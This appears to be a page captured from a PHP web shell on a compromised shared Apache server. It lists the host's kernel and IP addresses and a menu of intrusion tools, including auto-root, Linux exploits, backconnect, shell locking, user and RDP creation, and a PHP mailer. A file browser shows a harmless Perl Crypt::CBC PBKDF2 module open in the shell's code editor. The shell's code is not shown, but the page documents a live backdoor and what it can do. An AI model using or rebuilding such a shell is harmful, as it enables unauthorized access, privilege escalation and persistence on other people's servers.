Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Crypt /
CBC /
PBKDF /
[ HOME SHELL ]
Name
Size
Permission
Action
none.pm
542
B
-rw-r--r--
opensslv1.pm
690
B
-rw-r--r--
opensslv2.pm
489
B
-rw-r--r--
pbkdf2.pm
715
B
-rw-r--r--
randomiv.pm
893
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pbkdf2.pm
package Crypt::CBC::PBKDF::pbkdf2; use strict; use base 'Crypt::CBC::PBKDF'; use Crypt::PBKDF2; # options: # key_len => 32 default # iv_len => 16 default # iterations => 10000 default # hash_class => 'HMACSHA2' default sub create { my $class = shift; my %options = @_; $options{key_len} ||= 32; $options{iv_len} ||= 16; $options{iterations} ||= 10_000; $options{hash_class} ||= 'HMACSHA2'; return bless \%options,$class; } sub generate_hash { my $self = shift; my ($salt,$passphrase) = @_; my $pbkdf2 = Crypt::PBKDF2->new(%$self, output_len => $self->{key_len} + $self->{iv_len}); return $pbkdf2->PBKDF2($salt,$passphrase); } 1;
Close